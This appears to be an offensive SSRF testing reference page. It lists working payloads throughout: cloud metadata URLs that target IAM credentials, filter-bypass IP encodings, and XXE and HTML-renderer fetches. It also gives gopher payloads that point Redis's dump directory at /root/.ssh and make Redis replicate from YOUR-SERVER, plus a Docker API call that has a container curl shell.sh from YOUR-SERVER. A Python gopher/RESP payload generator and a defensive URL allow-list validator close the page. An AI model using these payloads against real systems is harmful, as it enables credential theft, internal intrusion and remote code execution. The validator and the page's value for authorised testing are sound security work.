Server-Side Request Forgery (SSRF) lets an attacker make the server initiate requests to internal or external resources of the attacker's choosing. Depending on what is reachable from the server, this leads to sensitive data exposure, cloud metadata (credential) access, internal port scanning, or remote code execution when chained with a service such as Redis or the Docker API. This section covers the full SSRF testing workflow: identifying candidate parameters, automating detection, crafting filter-bypass payloads, and chaining the primitive with other vulnerabilities.
Server-Side Request Forgery testing with cloud metadata endpoints, URL schemes, and exploitation techniques.
Last updated: 2026-05-15
Server-Side Request Forgery (SSRF) occurs when an application fetches a remote resource from a URL (or a host, port or path fragment) taken from user input without validating where that request will actually go.

Identifying candidate parameters

Grep a collected URL list for parameter names that usually carry URLs, and for endpoint names that imply server-side fetching:

```bash
cat urls.txt | grep -E 'url=|uri=|redirect=|next=|data=|path=|dest=|proxy=|file=|img=|out=|continue=' | sort -u
# -E so that | is alternation rather than a literal pipe character
cat urls.txt | grep -iE 'webhook|callback|upload|fetch|import|api' | sort -u
```

Parameter names worth testing by hand:

```text
url= uri= path= dest= redirect= redirect_uri= next= return= continue= domain= feed= host= port= callback= webhook= api= fetch= file= img= src= load= proxy=
```

Manual confirmation

```bash
curl "https://target.com/page?url=http://127.0.0.1:80/"
curl "https://target.com/page?url=http://localhost:8080"
curl "https://target.com/api?endpoint=http://169.254.169.254/latest/meta-data/"
curl "https://target.com/api?endpoint=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
```

Out-of-band detection (blind SSRF)

Blind SSRF may return no output at all. Point the parameter at a listener you control and watch for DNS or HTTP interactions:

```text
Burp Collaborator: https://target.com/?url=https://YOUR-ID.oastify.com
interactsh: run interactsh-client and use the hostname it prints
```

Automating this across a URL list with gf, qsreplace and httpx:

```bash
cat urls.txt | gf ssrf | qsreplace "https://xyz.oast.pro" | httpx -silent
cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx-toolkit -silent
cat urls.txt | gf ssrf > ssrf_urls.txt
```

Nuclei SSRF templates:

```bash
nuclei -t http/vulnerabilities/ssrf/ -l urls.txt
cat urls.txt | nuclei -t nuclei-templates/vulnerabilities/ssrf/
nuclei -t http/vulnerabilities/ssrf/ -l urls.txt -o ssrf_results.txt
```

SSRFmap (request.txt is the raw HTTP request, for example saved from Burp; -p names the parameter to inject into):

```bash
git clone https://github.com/swisskyrepo/SSRFmap.git && cd SSRFmap && pip install -r requirements.txt
python3 ssrfmap.py -r request.txt -p url -m readfiles
python3 ssrfmap.py -r request.txt -p url -m portscan
python3 ssrfmap.py -r request.txt -p url -m redis
```

Internal port and host scanning

```text
https://target.com/?url=http://127.0.0.1:22
https://target.com/?url=http://10.0.0.5:8080
```

```bash
ffuf -u "https://target.com/?url=http://127.0.0.1:FUZZ" -w ports.txt
ffuf -u "https://target.com/?url=http://10.0.0.FUZZ:80" -w ips.txt
```

Monitor for signals that distinguish open from closed ports: time delays, different status codes, response length, and DNS interactions.

Cloud metadata endpoints

```text
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://metadata.google.internal/
http://169.254.169.254/metadata/instance?api-version=2021-02-01
```

Caveat: a plain GET only works against AWS IMDSv1. IMDSv2 requires a token obtained with a PUT to /latest/api/token and sent back in the X-aws-ec2-metadata-token header, GCP requires the header Metadata-Flavor: Google, and Azure IMDS requires Metadata: true, so those need an SSRF that lets you control the method or headers.

Filter bypass payloads

Some apps block "localhost" or "127.0.0.1" as strings but still allow IPv6, decimal or hex IPs, DNS rebinding or redirect chains. The first four forms below are alternative spellings of 127.0.0.1 that inet_aton-style parsers accept; the @, # and %23 forms exploit disagreements between the validator's URL parser and the fetching client's; the last three rely on percent-decoding or Unicode dot mapping happening after validation.

```text
http://127.1
http://2130706433
http://0x7f000001
http://017700000001
http://[::1]
http://127.0.0.1%23.google.com
http://127.0.0.1@google.com
http://google.com@127.0.0.1
http://127.0.0.1#google.com
http://google.com#127.0.0.1
http://%31%32%37.0.0.1
http://127%2e0%2e0%2e1
http://127。0。0。1
```

Redirect chains through an open redirect on a domain the target trusts:

```text
https://trusted.com/redirect?url=http://127.0.0.1
https://target.com/?url=https://trusted.com/redirect?url=http://127.0.0.1
```

SSRF through file parsers (HTML-to-PDF renderers, XML importers):

```html
<img src="http://YOUR-SERVER/x">
<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
<link rel="stylesheet" href="http://YOUR-SERVER/style.css">
```

```xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://YOUR-SERVER/data">]>
```

Most parsers only fetch an external general entity once it is referenced (&xxe;) in the document body.

Exploitation targets and URL schemes

URL schemes to try: http://, https://, file://, gopher://, dict://

```text
gopher://127.0.0.1:6379/          (Redis)
gopher://127.0.0.1:9000/          (FastCGI / PHP-FPM)
http://127.0.0.1:2375/version     (Docker daemon API)
https://kubernetes.default.svc    (Kubernetes API server)
```

Redis via gopher (everything after the "_" item-type character is sent to the socket verbatim after percent-decoding):

```text
gopher://127.0.0.1:6379/_CONFIG%20SET%20dir%20/root/.ssh
gopher://127.0.0.1:6379/_SLAVEOF%20YOUR-SERVER%206379
```

Docker daemon API (unauthenticated TCP on 2375):

```text
POST /containers/create   {"Image":"alpine","Cmd":["curl","http://YOUR-SERVER/shell.sh"]}
```

This needs a POST body, so it requires an SSRF that controls the request method and body (or a gopher:// payload carrying the raw HTTP request), and the created container still has to be started with POST /containers/{id}/start.

Tools

SSRFmap: automatic SSRF exploitation tool with modules for file read, portscan, Redis, etc.
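The bypass list above works because the check and the fetch parse the host differently. The following is an added example, not code from this page or from any tool it mentions: it decodes each bypass spelling (shorthand, decimal, hex and octal IPv4, bracketed IPv6 including IPv4-mapped, percent-encoded and Unicode-dot hosts, userinfo tricks) to the address the fetching client would actually connect to, then applies an allow-list check that a URL-fetching feature should enforce. Name resolution goes through a caller-supplied resolver so the script runs offline; the resolver and the payload list are assumptions of the example.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Added example for this page, not code from any tool it mentions.  It decodes
# the host spellings used by the bypass payloads to a canonical IP and applies
# an allow-list check (globally routable addresses only).  Hostnames go through
# a caller-supplied resolver so the script runs offline; with no resolver an
# unresolved hostname is treated as unsafe (fail closed).

# IDNA/UTS46 maps these dot look-alikes to ".", which is why "127。0。0。1"
# reaches 127.0.0.1 once the host is converted to ASCII.
_DOT_LOOKALIKES = str.maketrans({"\u3002": ".", "\uff0e": ".", "\uff61": "."})


def _parse_number(tok: str) -> int:
    """One address part as inet_aton reads it: 0x.. hex, leading-0 octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", tok):
        return int(tok, 16)
    if re.fullmatch(r"0[0-7]*", tok):
        return int(tok, 8)
    if re.fullmatch(r"[0-9]+", tok):
        return int(tok, 10)
    raise ValueError(tok)


def inet_aton_lenient(host: str) -> Optional[ipaddress.IPv4Address]:
    """Decode the 1- to 4-part IPv4 forms accepted by BSD/glibc inet_aton.

    The last part fills every remaining byte, so "127.1" is 127.0.0.1 and a
    lone number ("2130706433", "0x7f000001", "017700000001") is the whole
    32-bit address.  Returns None for anything that is not such a form.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_parse_number(p) for p in parts]
    except ValueError:
        return None
    *lead, last = nums
    if any(n > 0xFF for n in lead) or last >= 256 ** (4 - len(lead)):
        return None
    value = last
    for i, n in enumerate(lead):
        value |= n << (8 * (3 - i))
    return ipaddress.IPv4Address(value)


def canonical_host(url: str) -> Optional[str]:
    """Host as the fetching client sees it, after the decodings the payloads count on.

    urlsplit discards userinfo before "@" and everything after "#", so
    "http://google.com@127.0.0.1" yields 127.0.0.1 while
    "http://127.0.0.1@google.com" yields google.com: the disagreement the
    @-payloads probe for.  Percent-encoding and dot look-alikes are folded here.
    """
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return None
    if not host:
        return None
    return unquote(host).translate(_DOT_LOOKALIKES).lower()


def url_target_ip(url: str, resolver=None):
    """Address the URL's host points at, or None if it cannot be determined.

    IP literals are decoded locally (lenient inet_aton forms, IPv6, IPv4-mapped
    IPv6); other names go through resolver(host) -> "a.b.c.d" (assumed interface).
    """
    host = canonical_host(url)
    if host is None:
        return None
    ip = inet_aton_lenient(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)        # IPv6 literals such as ::1
        except ValueError:
            if resolver is None:
                return None
            try:
                ip = ipaddress.ip_address(resolver(host))
            except (ValueError, OSError):
                return None
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                        # ::ffff:127.0.0.1 is still loopback
    return ip


def is_safe_fetch_url(url: str, resolver=None) -> bool:
    """Allow only http(s) URLs whose host lands on a globally routable address.

    Loopback, RFC 1918, link-local (169.254.0.0/16, hence every cloud metadata
    service), CGNAT, multicast and unspecified addresses all fail .is_global,
    and non-http schemes (file, gopher, dict) never pass.
    """
    try:
        scheme = urlsplit(url).scheme.lower()
    except ValueError:
        return False
    if scheme not in ("http", "https"):
        return False
    ip = url_target_ip(url, resolver)
    return ip is not None and ip.is_global


# Constructed input: the bypass payloads listed on this page plus a metadata URL.
BYPASS_PAYLOADS = [
    "http://127.1", "http://2130706433", "http://0x7f000001", "http://017700000001",
    "http://[::1]", "http://127.0.0.1%23.google.com", "http://127.0.0.1@google.com",
    "http://google.com@127.0.0.1", "http://127.0.0.1#google.com",
    "http://%31%32%37.0.0.1", "http://127%2e0%2e0%2e1", "http://127。0。0。1",
    "http://169.254.169.254/latest/meta-data/",
]


def audit(urls, resolver=None):
    """Map each URL to (decoded target IP or None, allowed?)."""
    result = {}
    for u in urls:
        ip = url_target_ip(u, resolver)
        result[u] = (str(ip) if ip is not None else None, is_safe_fetch_url(u, resolver))
    return result


if __name__ == "__main__":
    for u, (ip, ok) in audit(BYPASS_PAYLOADS).items():
        print(f"{'ALLOW' if ok else 'BLOCK':5} {ip or '-':16} {u}")
```

The check is an allow-list on the resolved address rather than a deny-list on strings, which is what defeats the alternative spellings. Two of the page's other bypasses are outside what any pre-fetch check can solve: DNS rebinding (the name resolves to a public address when checked and to 169.254.169.254 when fetched) requires connecting to the address that was validated rather than resolving again, and redirect chains require either disabling redirects or re-running this check on every hop.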
Gopher payload generator: generates gopher:// payloads for SSRF exploitation (Redis, MySQL, FastCGI)
interactsh (interactsh-client): out-of-band interaction tool for blind SSRF detection
Payload reference: comprehensive SSRF payload and technique reference
qsreplace: replaces query string parameter values, useful with gf for SSRF fuzzing
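The gopher:// Redis payloads above and the gopher payload generator in this list both rely on the same mechanism: a gopher URL carries raw TCP bytes, percent-encoded, to whatever listens on the port. The following is an added example, not code from this page, SSRFmap or the generator: it frames Redis commands in RESP (length-prefixed bulk strings, which the inline `_CONFIG%20SET...` form cannot do for arguments containing spaces or newlines), wraps them in a gopher URL, and decodes the URL back to the bytes Redis would receive. The command list is constructed from the two Redis commands on this page; YOUR-SERVER is the page's own placeholder.

```python
from urllib.parse import quote, unquote_to_bytes, urlsplit

# Added example for this page; not SSRFmap's or the gopher generator's code.
# A gopher:// SSRF payload delivers raw bytes: the selector is percent-encoded,
# the fetching client (curl-style) strips the leading item-type character, and
# the target service receives the remainder verbatim.


def resp_encode(command) -> bytes:
    """Frame one Redis command as a RESP array of bulk strings.

    Every argument is length-prefixed, so spaces, quotes and newlines in an
    argument are carried safely, unlike the space-separated inline form.
    """
    out = [b"*%d\r\n" % len(command)]
    for arg in command:
        data = arg if isinstance(arg, bytes) else str(arg).encode()
        out.append(b"$%d\r\n%s\r\n" % (len(data), data))
    return b"".join(out)


def gopher_url(host: str, port: int, payload: bytes) -> str:
    """Wrap raw bytes in a gopher URL.

    The first character after "/" is the gopher item type; clients drop it
    before sending, so "_" is a throwaway and everything after it goes on the
    wire once percent-decoded.  safe="" also encodes "/" so the selector
    survives URL parsing inside the vulnerable application.
    """
    return f"gopher://{host}:{port}/_" + quote(payload, safe="")


def redis_gopher_url(host: str, port: int, commands) -> str:
    """Pipeline several Redis commands into a single gopher:// request."""
    return gopher_url(host, port, b"".join(resp_encode(c) for c in commands))


def gopher_wire_bytes(url: str) -> bytes:
    """What the target service actually receives: selector minus item type, decoded."""
    return unquote_to_bytes(urlsplit(url).path[2:])


# Constructed from the two Redis commands shown on this page; YOUR-SERVER is
# the page's placeholder for an attacker-controlled host.
PAGE_COMMANDS = [
    ["CONFIG", "SET", "dir", "/root/.ssh"],
    ["SLAVEOF", "YOUR-SERVER", "6379"],
]

if __name__ == "__main__":
    url = redis_gopher_url("127.0.0.1", 6379, PAGE_COMMANDS)
    print(url)
    print(gopher_wire_bytes(url))
```

Because the whole selector is a single percent-encoded string, the same wrapper carries any line-oriented protocol (the page's FastCGI and dict:// cases differ only in the bytes passed to gopher_url), and the blind-SSRF caveat applies unchanged: Redis's replies are never returned to you, so confirm the effect out of band, for example with the SLAVEOF payload connecting back to YOUR-SERVER.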